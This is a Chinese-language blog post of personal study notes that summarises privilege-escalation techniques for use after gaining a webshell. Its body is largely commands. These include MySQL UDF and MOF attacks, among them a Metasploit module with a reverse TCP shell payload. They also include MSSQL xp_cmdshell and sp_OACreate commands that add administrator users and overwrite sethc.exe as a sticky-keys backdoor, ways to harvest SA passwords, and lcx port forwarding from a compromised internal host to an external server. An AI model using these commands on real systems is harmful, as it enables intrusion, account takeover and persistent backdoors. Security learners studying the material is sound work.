<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT" />










<meta name="description" content="提权方式总结1.什么是提权提权就是通过各种办法和漏洞，提高自己在服务器中的权限，以便控制全局。 Windows：User &gt;&gt; SystemLinux：User &gt;&gt; Root 2.提权的方式1.、系统漏洞提权（Linux、Windows） 2、数据库提权 3、系统配置错误提权 4、权限继承类提权 5、第三方软件&#x2F;服务提权 6、WebServer漏洞提权 1.系统漏洞提权系">
<meta property="og:type" content="article">
<meta property="og:title" content="提权方式总结">
<meta property="og:url" content="https://shu1l.github.io/2020/04/03/ti-quan-fang-shi-zong-jie/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="提权方式总结1.什么是提权提权就是通过各种办法和漏洞，提高自己在服务器中的权限，以便控制全局。 Windows：User &gt;&gt; SystemLinux：User &gt;&gt; Root 2.提权的方式1.、系统漏洞提权（Linux、Windows） 2、数据库提权 3、系统配置错误提权 4、权限继承类提权 5、第三方软件&#x2F;服务提权 6、WebServer漏洞提权 1.系统漏洞提权系">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20190611101318911.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM4Njg0NTA0,size_16,color_FFFFFF,t_70">
<meta property="article:published_time" content="2020-04-03T05:30:39.000Z">
<meta property="article:modified_time" content="2020-04-03T07:31:17.723Z">
<meta property="article:author" content="Shu1L">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://img-blog.csdnimg.cn/20190611101318911.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM4Njg0NTA0,size_16,color_FFFFFF,t_70">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://shu1l.github.io/2020/04/03/ti-quan-fang-shi-zong-jie/"/>





  <title>提权方式总结 | Hexo</title>
  








<meta name="generator" content="Hexo 4.2.0"><link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Hexo</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/%20" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://shu1l.github.io/2020/04/03/ti-quan-fang-shi-zong-jie/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Shu1L">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Hexo">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">提权方式总结</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2020-04-03T13:30:39+08:00">
                2020-04-03
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="提权方式总结"><a href="#提权方式总结" class="headerlink" title="提权方式总结"></a>提权方式总结</h2><h4 id="1-什么是提权"><a href="#1-什么是提权" class="headerlink" title="1.什么是提权"></a>1.什么是提权</h4><p>提权就是通过各种办法和漏洞，提高自己在服务器中的权限，以便控制全局。</p>
<p>Windows：User &gt;&gt; System<br>Linux：User &gt;&gt; Root</p>
<h4 id="2-提权的方式"><a href="#2-提权的方式" class="headerlink" title="2.提权的方式"></a>2.提权的方式</h4><p>1.、系统漏洞提权（Linux、Windows）</p>
<p>2、数据库提权</p>
<p>3、系统配置错误提权</p>
<p>4、权限继承类提权</p>
<p>5、第三方软件/服务提权</p>
<p>6、WebServer漏洞提权</p>
<h4 id="1-系统漏洞提权"><a href="#1-系统漏洞提权" class="headerlink" title="1.系统漏洞提权"></a>1.系统漏洞提权</h4><p>系统漏洞提权一般就是利用系统自身缺陷，用来提升权限。为了使用方便，windows和linux系统均有提权用的可执行文件。</p>
<p>Windows的提权exp一般格式为MS08067.exe；<br>Linux的提权exp一般格式为2.6.18-194或2.6.18.c。</p>
<h5 id="windows提权"><a href="#windows提权" class="headerlink" title="windows提权"></a>windows提权</h5><ul>
<li>漏洞编号命名格式</li>
</ul>
<p>Windows系统漏洞编号命名格式为：MS08067</p>
<p>其中：MS是Micosoft的缩写，固定格式；08 表示年份，即2008年发布的漏洞；067 表示顺序，即当年度发布的第67个漏洞。</p>
<ul>
<li>使用exp提权</li>
</ul>
<p>在日常渗透测试过程中，我们常常会先是拿到webshell再进行提权。所以提权脚本也常常会被在webshell中运行使用。</p>
<p>那么我们如何知道使用哪个exp来提权呢？</p>
<p>我们可以使用systeminfo命令或者查看补丁目录，查看补丁记录，来判断有哪个补丁没打，然后使用相对应的exp进行提权。</p>
<p><strong>TIPS：</strong></p>
<p>1.渗透过程中经常会遇到管理员禁止了cmd.exe的使用，我们该怎么办？进止了exe文件的上传怎么办？<br> 2.管理员禁止了一些脚本函数的运行，看不到回显怎么办？<br> 3.在使用webshell提权的时候要特别注意：<br> asp的webshell要支持：<br> wscript(wscript.shell/shell.application)<br> aspx能调用.net组件来执行cmd的命令<br> /c whoami</p>
<h5 id="linux系统提权"><a href="#linux系统提权" class="headerlink" title="linux系统提权"></a>linux系统提权</h5><p>Linux系统漏洞的exp一般按照内核版本来命名：2.6.18-194或2.6.18.c</p>
<p>形如2.6.18-194，可以直接执行；形如2.6.18.c，需要编译后运行，提权。当然也有少部分exp是按照发行版版本命名。</p>
<p>使用exp</p>
<p>一般情况下linux的本地提权要用nc反弹出来，因为Linux下提升权限后得到的是交互式shell，需反弹才能进行下一步命令的执行。<br>我们可以使用uname -a命令或者cat /proc/version，来判断系统的内核情况等等，然后使用相对应的exp进行提权。<br>注：</p>
<p>提权过程中需要为你的提权exp赋权，chmod。<br>linux服务器很多情况下管理员会设置目录权限，我们无法修改，但是一般/tmp/目录不会被设置权限，这和windows下的tmp和回收站是一个道理，所以我们可以将exp存放到/tmp目录下。</p>
<h4 id="数据库提权"><a href="#数据库提权" class="headerlink" title="数据库提权"></a>数据库提权</h4><p>数据库提权是指：通过执行数据库语句、数据库函数等方式提升服务器用户的权限。</p>
<p>首先我们要先有能力登入数据库，所以通常我们拿到webshell之后要去网站目录去找数据库连接文件，常在形如xxx.conf或conf.xxx文件中。</p>
<h5 id="MySQL数据库提权"><a href="#MySQL数据库提权" class="headerlink" title="MySQL数据库提权"></a>MySQL数据库提权</h5><p>MySQL数据库一般是使用udf（用户自定义函数）提权或mof（托管对象格式）提权。</p>
<ul>
<li>udf提权（用户自定义函数）</li>
</ul>
<p><strong>条件：</strong><br>1、系统版本（Windows2000，XP,Win2003)；<br>2、拥有MYSQL的某个账号，且该账号具有对msql的insert与delete权限；<br>3、具有root账号密码。</p>
<p><strong>使用方法：</strong><br>1、获取当前mysql的一个数据库连接信息，通常包含地址、端口、账号、密码、库名等五个信息。<br>2、把udf专用的webshell传到服务器上，访问并进行数据库连接。<br>3、连接成功后，导出DLL文件。</p>
<p><strong>注：</strong></p>
<ul>
<li>Mysql&lt;5.0，导出路径随意;</li>
<li>5.0&lt;=mysql&lt;5.1，则需要导出至目标服务器的系统目录（如：system32），否则在下一步操作中你会看到“No paths allowed for shared library”错误；</li>
<li>mysql&gt;5.1，需要导出dll到插件路径，例如：D:\Program Files\MySQL\MySQL Server 5.1.3\lib\plugin<br>若mysql&gt;=5.0，语句中的DLL不允许带全路径，如果在第二步中已将DLL导出到系统目录，那么你就可以省略路径而使命令正常执行，否则将会看到”Can’t open shared library“错误。</li>
<li>如果提示“Function ‘cmdshell’ already exists”，则输入下列语句可以解决：drop function cmdshell;</li>
</ul>
<p><strong>使用SQL语句创建自定义函数。语法如下：</strong></p>
<p><code>Create Function 函数名 returns string soname &#39;导出的DLL路径&#39;;
eg: Create Function cmdshell returns string soname &#39;udf.dll&#39;;</code></p>
<p><strong>功能函数说明：</strong></p>
<ul>
<li>cmdshell 执行cmd;</li>
<li>downloader 下载者,到网上下载指定文件并保存到指定目录;</li>
<li>open3389 通用开3389终端服务,可指定端口(不改端口无需重启);</li>
<li>backshell 反弹Shell;</li>
<li>ProcessView 枚举系统进程;</li>
<li>KillProcess 终止指定进程;</li>
<li>regread 读注册表;</li>
<li>regwrite 写注册表;</li>
<li>shut 关机,注销,重启;</li>
<li>about 说明与帮助函数;</li>
</ul>
<p><strong>创建函数成功后，就可以通过sql语句调用它了。</strong></p>
<p>语法如下：<br>select 创建的函数名 (‘参数列表’);<br>eg: select cmdshell(“net user nsfocus Nsf0cus /add”)；创建一个用户nsfocus，密码为Nsf0cus</p>
<p><strong>函数使用完后，我们需要把之前生成的DLL和创建的函数删除掉，但要注意次序，必须先删除函数再删除DLL。</strong></p>
<p>删除函数的语法如下：<br>drop function 创建的函数名;<br>eg: drop function cmdshell;</p>
<h5 id="整体思路："><a href="#整体思路：" class="headerlink" title="整体思路："></a>整体思路：</h5><ul>
<li>导出C:\windows\udf.dll</li>
<li>Create Function cmdshell returns string soname ‘udf.dll’;</li>
<li>select cmdshell(‘whoami’)</li>
<li>drop function cmdshell</li>
</ul>
<h5 id="Mof提权（托管对象格式）"><a href="#Mof提权（托管对象格式）" class="headerlink" title="Mof提权（托管对象格式）"></a>Mof提权（托管对象格式）</h5><p>提权c:/windows/system32/wbem/mof/</p>
<pre><code>- use exploit/windows/mysql/mysql_mof
- set password xxx
- set username xxx
- set rhost xxx
- set rport xxx
- set payload windows/shell_reverse_tcp
- set lhost xxx
- set lport xxx
- exploit</code></pre><h5 id="Mssql数据库提权"><a href="#Mssql数据库提权" class="headerlink" title="Mssql数据库提权"></a>Mssql数据库提权</h5><p><img src="https://img-blog.csdnimg.cn/20190611101318911.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM4Njg0NTA0,size_16,color_FFFFFF,t_70" alt="img"></p>
<p><strong>在SA权限下</strong></p>
<p>1.存在xp_cmdshell时<br>使用xp_cmdshell执行命令添加用户，当出现错误可以恢复和开启xp_cmdshell</p>
<p>2.xp_cmdshell无法使用时<br>    使用sp_OACreate执行命令，同样当出现错误可以恢复和开启</p>
<ol start="3">
<li><p>当执行命令无法使用时可以用沙盒提权 (使用xp_regwrite和openrowset)</p>
</li>
<li><p>当只有xp_regwrite可用时可以劫持粘滞键（sethc.exe)<br>使用xp_regwrite修改注册表</p>
</li>
</ol>
<p><strong>DBA权限下</strong></p>
<ol>
<li>备份到网站目录</li>
<li>通过备份文件到启动项提权</li>
</ol>
<h5 id="SA口令获取方法"><a href="#SA口令获取方法" class="headerlink" title="SA口令获取方法"></a>SA口令获取方法</h5><ul>
<li><strong>Webshell或源码获取</strong></li>
</ul>
<p>一般在网站的配置文件中有存放明文账号密码，常用配置文件名如：</p>
<pre><code>conn.aspx
config.aspx
config.php
web.config
.........

一般格式如：

server=localhost;
UID=sa;
PWD=shadowflow</code></pre><ul>
<li><strong>源代码泄露</strong></li>
</ul>
<p>网站源码泄露情况主要以程序员上传代码到git等开源平台或更新代码时未删除备份文件(.svn、.git、.bak），以及运维人员打包源代码到网站服务器(<a href="http://www.rar/" target="_blank" rel="noopener">www.rar</a>等）。</p>
<ul>
<li><strong>嗅探</strong></li>
</ul>
<p>在局域网中使用cain等工具进行arp嗅探的时候可以抓取到1433端口的数据库明文登录密码</p>
<ul>
<li><strong>口令暴力破解</strong></li>
</ul>
<p>利用mssql暴力破解工具对mssql进行暴力破解，一旦成功将获得sa相应权限</p>
<p><strong>常用SQL Server提权语句</strong></p>
<pre><code>查看数据库版本：select @@version

查看数据库系统参数：exec master..xp_msver;

查看用户所属角色信息：sp_helpsrvrolemember

查看当前数据库：select db_name()

显示机器上的驱动器：xp_availablemedia

查看当前账户权限

select IS_SRVROLEMEMBER(&#39;sysadmin&#39;) #判断是否为sa权限

类似serveradmin,setupadmin,securityadmin,diskadmin,bulkadmin

select IS_MEMBER(&#39;db_owner&#39;) #判断是否为dbo权限

添加用户

exec master.dbo.sp_addlogin test,password #添加用户

exec master.dbo.sp_addsrvrolemember test,sysadmin #加权限

启动停止服务

exec master..xp_servicecontrol &#39;stop&#39;,&#39;test&#39;

exec master..xp_servicecontrol &#39;start&#39;,&#39;test&#39;

检查功能

SELECT count(*）FROM master.dbo.sysobjects WHERE name=&#39;xp_cmdshell&#39;

xp_cmdshell, xpregread,sp_makewebtask,xp_subdirs,xp_dirtree, sp_addextendedproc
</code></pre><p><strong>xp_cmdshell</strong></p>
<pre><code>1、开启xp_cmdshell存储过程

exec sp_configure &#39;show advanced options&#39;,1;RECONFIGURE;
exec sp_configure &#39;xp_cmdshell&#39;,1;RECONFIGURE;

2、关闭xp_cmdshell存储过程

exec sp_configure &#39;show advanced options&#39;, 1, RECONFIGURE;
exec sp_configure &#39;xp_cmdshell&#39;,0;RECONFIGURE;

3、xp_cmdshell执行命令

exec master..xp_cmdshell &#39;ver&#39;
exec master.dbo.xp_cmdshell &#39;net localgroup administrators test /add&#39;

4、恢复xp_cmdshell

exec sp_dropextendedproc &#39;xp_cmdshell&#39;

dbcc addextendedproc (&quot;xp_cmdshell&quot;,&quot;xplog70.dll) OR dbcc addextendedproc (&quot;xp_cmdshell&quot;,&quot;d:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll&quot;);EXEC sp_configure &#39;show advanced options&#39;, 0 --
</code></pre><p><strong>sp_OACreate</strong></p>
<pre><code>1、开启sp_OACreate
exec sp_configure &#39;show advanced options&#39;, 1;RECONFIGURE;
exec sp_configure &#39;Ola Automation Procedures&#39; , 1;RECONFIGURE;

2、关闭sp_OACreate
exec sp_configure &#39;show advanced options&#39;,1;RECONFIGURE;
exec sp_configure &#39;Ole Automation Procedures&#39;,0;RECONFIGURE;

3、禁用advanced options
EXEC sp_configure &#39;show advanced options&#39;,0;GO RECONFIGURE;

4、sp_OACreate执行命令

DECLARE @js int
EXEC sp_OACreate &#39;ScriptControl&#39;,@js OUT
EXEC sp_OASetProperty @js,&#39;Language&#39;,&#39;JavaScript&#39;
ActiveXObject(&quot;Shell.Users&quot;);z=o.create(&quot;user&quot;);z.changePassword(&quot;pass&quot;,&quot;&quot;);z.setting(&quot;AccountType&quot;)=3;&#39;

5、sp_OACreate移动文件
declare @aa int
exec sp_oacreate &#39;scripting.filesystemobject&#39; @aa out
exec sp_oamethod @aa, &#39;moveFile&#39;,null,&#39;c:\temp\ipmi.log&#39;,&#39;c:\temp\ipmi1.log&#39;;

6、sp_OACreate复制文件

declare @o int

exec sp_oacreate &#39;scripting.filesystemobject&#39;, @o out

exec sp_oamethod @o,&#39;copyfile&#39;,null,&#39;c:\windows\explorer.exe&#39;,&#39;c:\windows\system32\sethc.exe&#39;;

7、sp_OACreate删除文件

DECLARE @Result int

DECLARE @FSO_Token int

EXEC @Result = sp_OACreate &#39;Scripting.FileSystemObject&#39;, @FSO_Token OUTPUT

EXEC @Result = sp_OAMethod @FSO_Token, &#39;DeleteFile&#39;,NULL,&#39;c:\Documents and Settings\All Users\ [开始] 菜单\程序\启动\user.bat&#39;

EXEC @Result = sp_OADestrop @FSO_Token

8、wscript.shell执行命令

9、Shell.Application执行命令

10、sp_oacreate 替换粘贴键
</code></pre><p><strong>沙盒执行命令</strong></p>
<p>openrowset开启</p>
<p>openrowset关闭</p>
<p>沙盒执行命令</p>
<p><strong>注册表篡改</strong></p>
<p>注册表劫持粘贴键</p>
<h4 id="系统配置不当提权"><a href="#系统配置不当提权" class="headerlink" title="系统配置不当提权"></a>系统配置不当提权</h4><p>利用配置不当提权</p>
<ul>
<li>前提：已经成功渗透进目标系统；</li>
<li>相比利用漏洞提权，是更常用的方法；</li>
<li>在大部分企业中，会将系统的漏洞即时进行补丁更新，难以通过系统自身我的漏洞进行入侵；</li>
<li>可以查找系统中以system权限启动的服务或应用，可以尝试将其替换或者反弹shell的方式提权；</li>
<li>可以查找NTFS权限允许users修改删除的应用，利用配置不当进行提权；</li>
<li>代码中是否有过滤参数的操作等都可以加以利用，进行提取</li>
</ul>
<h4 id="权限继承类提权"><a href="#权限继承类提权" class="headerlink" title="权限继承类提权"></a>权限继承类提权</h4><p><strong>开机启动项提权？</strong><br>windows开机时候都会有一些开机启动的程序，那时候启动的程序权限都是system，因为是system把他们启动的，利用这点，我们可以将自动化脚本写入启动项，达到提权的目的。</p>
<h4 id="第三方软件-服务提权"><a href="#第三方软件-服务提权" class="headerlink" title="第三方软件/服务提权"></a>第三方软件/服务提权</h4><h4 id="WebServer漏洞提权"><a href="#WebServer漏洞提权" class="headerlink" title="WebServer漏洞提权"></a>WebServer漏洞提权</h4><h4 id="提权中常见的问题"><a href="#提权中常见的问题" class="headerlink" title="提权中常见的问题"></a>提权中常见的问题</h4><p>cmd无法执行</p>
<ul>
<li><p>cmd被删除</p>
<ul>
<li>绕过思路：找可读可写目录，上传cmd.exe</li>
</ul>
</li>
<li><p>cmd被降权</p>
<ul>
<li>绕过思路：找可读可写目录，上传cmd.exe</li>
</ul>
</li>
<li><p>组件被删除</p>
<ul>
<li>切换组件</li>
</ul>
</li>
<li><p>防护软件拦截</p>
<ul>
<li>很难绕过</li>
</ul>
</li>
<li><p>3389无法连接</p>
</li>
<li><p>端口被修改</p>
<ul>
<li>找端口（1-65535），使用端口扫描工具、注册表读取、查询PID</li>
</ul>
</li>
<li><p>端口被关闭</p>
<ul>
<li>上传3389打开工具到可读可写目录，需要先提权，调用执行exe工具</li>
</ul>
</li>
<li><p>内网环境</p>
<ul>
<li>端口转发：<ol>
<li>外网服务器：lcx.exe -listen 1234 4321 (监听1234端口的流量并将其转发至本地4321端口)</li>
<li>内网肉鸡：lcx.exe -slave 121.43.99.73 1234 192.168.1.106 1111 (将本地192.168.1.106的1111端口流量转发至121.43.99.73的1234端口上)</li>
<li>外网 连接本地端口4321 即代表连接肉鸡的1111端口</li>
</ol>
</li>
</ul>
</li>
<li><p>防护软件拦截</p>
<ul>
<li>很困难</li>
</ul>
</li>
</ul>
<h3 id="提权辅助工具"><a href="#提权辅助工具" class="headerlink" title="提权辅助工具"></a>提权辅助工具</h3><h5 id="1-Linux提权辅助工具"><a href="#1-Linux提权辅助工具" class="headerlink" title="1.Linux提权辅助工具"></a>1.Linux提权辅助工具</h5><p>Linux_Exploit_Suggester是一款根据操作系统版本号自动查找相应提权脚本的工具，如果不带任何参数运行该脚本的话，将执行uname -r返回的操作系统发行版本，或者手工输入-k参数查找指定版本号。</p>
<p>github项目地址：</p>
<pre><code>https://github.com/InteliSecureLabs/Linux_Exploit_Suggester</code></pre><p> 用法示例：</p>
<pre><code>$ perl ./Linux_Exploit_Suggester.pl -k 2.6.28</code></pre><h5 id="2-Windows提权辅助工具"><a href="#2-Windows提权辅助工具" class="headerlink" title="2.Windows提权辅助工具"></a>2.Windows提权辅助工具</h5><p>Windows-Exploit-Suggester是受Linux_Exploit_Suggester的启发而开发的一款提权辅助工具，用python开发而成，通过比对systeminfo生成的文件，从而发现系统是否存在未修复漏洞。</p>
<p>github项目地址：</p>
<pre><code>https://github.com/AonCyberLabs/Windows-Exploit-Suggester</code></pre><p>用法示例：</p>
<pre><code>#查看系统可能存在的漏洞
$ ./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt 
$ ./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --ostext &#39;windows server 2008 r2&#39;</code></pre><h5 id="3-gfto"><a href="#3-gfto" class="headerlink" title="3.gfto"></a>3.gfto</h5><p>gtfo是一个纯粹用python3编写的工具，用于搜索GTFOBins和LOLBAS上的二进制文件。</p>
<p>github项目地址： </p>
<pre><code>https://github.com/mzfr/gtfo</code></pre><p>很明显，从以上描述里，我们知道这款工具并不是主角，需要重点关注的是GTFOBins和LOLBAS。</p>
<p>GTFOBins：Linux命令提权辅助查询.</p>
<h5 id="4-Beroot"><a href="#4-Beroot" class="headerlink" title="4.Beroot"></a>4.Beroot</h5><p>BeRoot Project是一个利用后的工具，可以检查常见的错误配置，以找到提升我们特权的方法，该项目可在Windows，Linux和Mac OS上运行。</p>
<p>github项目地址：</p>
<pre><code>https://github.com/AlessandroZ/BeRoot</code></pre><h5 id="5-Vulmap"><a href="#5-Vulmap" class="headerlink" title="5.Vulmap"></a>5.Vulmap</h5><p>Vulmap是一个开源的在线本地漏洞扫描程序项目。它由适用于Windows和Linux操作系统的联机本地漏洞扫描程序组成。</p>
<p>Github项目地址：</p>
<pre><code>https://github.com/vulmon/Vulmap</code></pre><h5 id="6-WindowsVulnScan"><a href="#6-WindowsVulnScan" class="headerlink" title="6.WindowsVulnScan"></a>6.WindowsVulnScan</h5><p>这是一款基于主机的漏洞扫描工具，查看查找主机上具有的CVE和具有公开EXP的CVE。</p>
<p>github项目地址：</p>
<pre><code>https://github.com/chroblert/WindowsVulnScan</code></pre><h5 id="7、ATRoot-Auxiliary-v2-0"><a href="#7、ATRoot-Auxiliary-v2-0" class="headerlink" title="7、ATRoot Auxiliary v2.0"></a>7、ATRoot Auxiliary v2.0</h5><p>基于java开发的提权辅助工具，支持双端加载，本地模式配置文件存放于本地软件目录下的conf目录；远程模式则可以更新配置文件</p>
<h5 id="8、在线提权漏洞检测平台"><a href="#8、在线提权漏洞检测平台" class="headerlink" title="8、在线提权漏洞检测平台"></a>8、在线提权漏洞检测平台</h5><p>一款为主流 Linux/Unix 和 Windows 系统提供精准且高效的操作系统脆弱性漏洞检测的专业化平台，基于其强大的安全检测能力，能够给出专业的修复建议，有效验证和加固网络资产漏洞。</p>
<p>在线查询地址：</p>
<pre><code>https://detect.secwx.com/</code></pre><h5 id="9-提权辅助网页"><a href="#9-提权辅助网页" class="headerlink" title="9.提权辅助网页"></a>9.提权辅助网页</h5><p>在Windows提权的时候，对比补丁找Exp很烦吧？老是忘记一些提权命令跟工具的语法很苦逼吧？没事，有了这款工具什么问题都解决~</p>
<p>在线查询地址：</p>
<pre><code>http://bugs.hacking8.com/tiquan/</code></pre>
      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/04/03/wen-jian-bao-han-lou-dong-xue-xi-bi-ji/" rel="next" title="文件包含漏洞学习笔记">
                <i class="fa fa-chevron-left"></i> 文件包含漏洞学习笔记
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/04/03/csrf-ssrf-lou-dong-xue-xi/" rel="prev" title="CSRF+SSRF漏洞学习">
                CSRF+SSRF漏洞学习 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Shu1L</p>
              <p class="site-description motion-element" itemprop="description">欢迎来到Shu1L的神秘小屋！</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives">
              
                  <span class="site-state-item-count">29</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">1</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">1</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#提权方式总结"><span class="nav-number">1.</span> <span class="nav-text">提权方式总结</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1-什么是提权"><span class="nav-number">1.0.1.</span> <span class="nav-text">1.什么是提权</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2-提权的方式"><span class="nav-number">1.0.2.</span> <span class="nav-text">2.提权的方式</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#1-系统漏洞提权"><span class="nav-number">1.0.3.</span> <span class="nav-text">1.系统漏洞提权</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#windows提权"><span class="nav-number">1.0.3.1.</span> <span class="nav-text">windows提权</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#linux系统提权"><span class="nav-number">1.0.3.2.</span> <span class="nav-text">linux系统提权</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#数据库提权"><span class="nav-number">1.0.4.</span> <span class="nav-text">数据库提权</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#MySQL数据库提权"><span class="nav-number">1.0.4.1.</span> <span class="nav-text">MySQL数据库提权</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#整体思路："><span class="nav-number">1.0.4.2.</span> <span class="nav-text">整体思路：</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Mof提权（托管对象格式）"><span 